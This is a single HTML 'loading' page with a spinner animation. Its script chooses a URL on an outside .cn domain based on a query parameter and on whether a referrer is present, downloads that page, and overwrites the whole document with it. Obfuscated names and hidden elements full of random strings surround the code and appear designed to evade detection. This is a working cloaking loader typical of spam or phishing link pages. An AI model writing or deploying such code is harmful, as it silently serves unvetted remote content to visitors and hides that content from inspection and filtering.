<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .OFdGAgN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .OFdGAgN .T0EmrVXU {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .OFdGAgN .content {
            line-height: 50px;
            text-align: center
        }

        .OFdGAgN .img {
            width: 100%
        }

        .OFdGAgN .ziwRTZpJTp {
            text-align: center
        }

        .OFdGAgN .ziwRTZpJTp span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .OFdGAgN .ziwRTZpJTp span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .OFdGAgN .ziwRTZpJTp span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .OFdGAgN .ziwRTZpJTp span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .OFdGAgN .ziwRTZpJTp span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .OFdGAgN .ziwRTZpJTp span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .OFdGAgN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function t4XVDFL4HE(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var QVowdfM = t4XVDFL4HE('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ QVowdfM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ QVowdfM +".html?a=share";
		}
		
        AkKFfFsF6=url+"#"+new Date().getTime();
        AkKFfFsF6 && function() {
            $.get(AkKFfFsF6, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>wFWNKLOPSNAToH7VHbnY0jOVUb2JD3xrbuwSX5D35LhI1NrTYsplsi</div>
<img  src='' style='display:none'>
<ul style='display:none' >AK7yoF6rsbxgW2imQ4CcezFX</ul>
<li style='display:none' >CjVQPlRnFnybEzKV9QZCkB7c3rBcbnbGi</li>
<li style='display:none' >CjVQPlRnFnybEzKV9QZCkB7c3rBcbnbGi</li>
<ul style='display:none' >AK7yoF6rsbxgW2imQ4CcezFX</ul><div class="OFdGAgN">
    <div class="T0EmrVXU">
        <div class="ziwRTZpJTp">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >S8zdUDZwVLQ0GRHVRnA9b8yr7IlNxWVnCSnVDe0jQ0I6QsNZGEUV57OTr0XyvEBqz7W</h1>
<h1 style='display:none' >S8zdUDZwVLQ0GRHVRnA9b8yr7IlNxWVnCSnVDe0jQ0I6QsNZGEUV57OTr0XyvEBqz7W</h1>
<span style='display:none'>IlJtHZVfXn0Vsjhp8jLCAotNjBwooISFGmrHKCnsnFnhg2AtNAxaPWkWpsxQPN5ll</span></body>
</html>